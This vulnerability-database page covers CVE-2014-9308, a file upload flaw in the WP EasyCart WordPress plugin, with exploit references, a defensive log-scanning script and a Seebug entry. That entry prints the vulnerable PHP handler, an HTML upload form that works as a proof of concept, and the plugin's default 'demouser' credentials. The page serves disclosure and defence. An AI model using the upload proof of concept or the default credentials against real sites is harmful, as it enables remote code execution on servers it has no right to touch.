CVE-2014-9308 - Unspecified vulnerability in Wpeasycart WP Easycart

047910
CVSS 6.5 - MEDIUM
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: SINGLE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Tags: network, low complexity, wpeasycart, exploit available, metasploit

Summary

Unrestricted file upload vulnerability in inc/amfphp/administration/banneruploaderscript.php in the WP EasyCart (aka WordPress Shopping Cart) plugin before 3.0.9 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in products/banners/. CWE-434: Unrestricted Upload of File with Dangerous Type (http://cwe.mitre.org/data/definitions/434.html)
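
A defender-side check for the pattern described in the summary, as an added example (not code from the advisory or the plugin): it scans web access logs for successful POSTs to the uploader script and for requests to script-type files under products/banners/. The common/combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common/combined access-log line: client, method, path, status.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
UPLOADER = "/wp-easycart/inc/amfphp/administration/banneruploaderscript.php"
BANNERS = "/wp-easycart/products/banners/"
# Assumption: extensions this server passes to an interpreter. A trailing
# "." is also matched so double extensions such as x.php.jpg are flagged.
EXECUTABLE = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2015:10:00:01 +0000] "POST /wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php HTTP/1.1" 200 5',
    '203.0.113.7 - - [10/Jan/2015:10:00:03 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/test_1.php HTTP/1.1" 200 120',
    '198.51.100.4 - - [10/Jan/2015:10:01:00 +0000] "GET /wp-content/plugins/wp-easycart/products/banners/sale_1.jpg HTTP/1.1" 200 40213',
]

def find_upload_abuse(lines):
    """Return (kind, client_ip, path) tuples for suspicious requests."""
    uploaders = set()   # clients that successfully POSTed to the uploader
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string and decode %-escapes before matching.
        path = unquote(m["path"].split("?", 1)[0])
        ok = int(m["status"]) < 400
        if m["method"] == "POST" and path.endswith(UPLOADER) and ok:
            uploaders.add(m["ip"])
            findings.append(("upload", m["ip"], path))
        elif BANNERS in path and ok:
            name = path.rsplit("/", 1)[-1]
            if EXECUTABLE.search(name):
                kind = "exec-after-upload" if m["ip"] in uploaders else "exec"
                findings.append((kind, m["ip"], path))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG):
        print(*finding)
```

Any hit on a site running a plugin version before 3.0.9 is a reason to inspect products/banners/ on disk for files that are not images.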

Vulnerable Configurations

Part         Description  Count
Application  Wpeasycart   93

Exploit-Db

  • description: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload. CVE-2014-9308. Webapps exploit for php platform
    file: exploits/php/webapps/35730.html
    id: EDB-ID:35730
    last seen: 2016-02-04
    modified: 2015-01-08
    platform: php
    port: 80
    published: 2015-01-08
    reporter: Kacper Szurek
    source: https://www.exploit-db.com/download/35730/
    title: WordPress Shopping Cart 3.0.4 - Unrestricted File Upload
    type: webapps
  • description: WordPress WP EasyCart Unrestricted File Upload. CVE-2014-9308. Webapps exploit for php platform
    id: EDB-ID:36043
    last seen: 2016-02-04
    modified: 2015-02-10
    published: 2015-02-10
    reporter: metasploit
    source: https://www.exploit-db.com/download/36043/
    title: WordPress WP EasyCart - Unrestricted File Upload

Metasploit

description: WordPress Shopping Cart (WP EasyCart) Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the /inc/amfphp/administration/banneruploaderscript.php script does not properly verify or sanitize user-uploaded files. By uploading a .php file, the remote system will place the file in a user-accessible path. Making a direct request to the uploaded file will allow the attacker to execute the script with the privileges of the web server. In versions <= 3.0.8 authentication can be done by using the WordPress credentials of a user with any role. In later versions, a valid EasyCart admin password will be required that is in use by any admin user. A default installation of EasyCart will set up a user called "demouser" with a preset password of "demouser".
id: MSF:EXPLOIT/UNIX/WEBAPP/WP_EASYCART_UNRESTRICTED_FILE_UPLOAD
last seen: 2020-06-05
modified: 2018-10-01
published: 2015-01-10
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9308
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
title: WordPress WP EasyCart Unrestricted File Upload

Packetstorm

data source: https://packetstormsecurity.com/files/download/129875/wpshoppingcart-shell.txt
id: PACKETSTORM:129875
last seen: 2016-12-05
published: 2015-01-09
reporter: Kacper Szurek
source: https://packetstormsecurity.com/files/129875/WordPress-Shopping-Cart-3.0.4-Unrestricted-File-Upload.html
title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload

Seebug

bulletinFamily: exploit
description:
    # Affected version: WordPress Shopping Cart 3.0.4
    # Date: 29-10-2014
    # Software link: https://wordpress.org/plugins/wp-easycart/
    # CVE: CVE-2014-9308
    # Category: Application

    Vulnerability details:
    Any registered user can upload any file.
    Upload point: wp-easycart\inc\amfphp\administration\banneruploaderscript.php

        // Request-supplied value that becomes part of the stored file name
        $date = $_POST['datemd5'];
        $usersqlquery = sprintf("SELECT ec_user.*, ec_role.admin_access FROM ec_user LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE ec_user.password = '%s' AND (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
        $userresult = mysql_query($usersqlquery);
        $users = mysql_fetch_assoc($userresult);
        // Passes for an EasyCart admin OR for any logged-in WordPress user
        if ($users || is_user_logged_in()) {
            $filename = $_FILES['Filedata']['name'];
            $filetmpname = $_FILES['Filedata']['tmp_name'];
            $fileType = $_FILES["Filedata"]["type"];
            $fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);
            $explodedfilename = pathinfo($filename);
            $nameoffile = $explodedfilename['filename'];
            $fileextension = $explodedfilename['extension'];
            // No extension or content check: the client-supplied extension is kept as-is
            move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
        }

    Verification: Log in as a regular user (created using wp-login.php?action=register):

        <form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
            <input type="hidden" name="datemd5" value="1">
            <input type="file" name="Filedata">
            <input value="Upload!" type="submit">
        </form>

    File will be visible: http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
id: SSV:89276
last seen: 2017-11-19
modified: 2015-08-31
published: 2015-08-31
source: https://www.seebug.org/vuldb/ssvid-89276
title: WordPress Shopping Cart 3.0.4 -- Arbitrary File Upload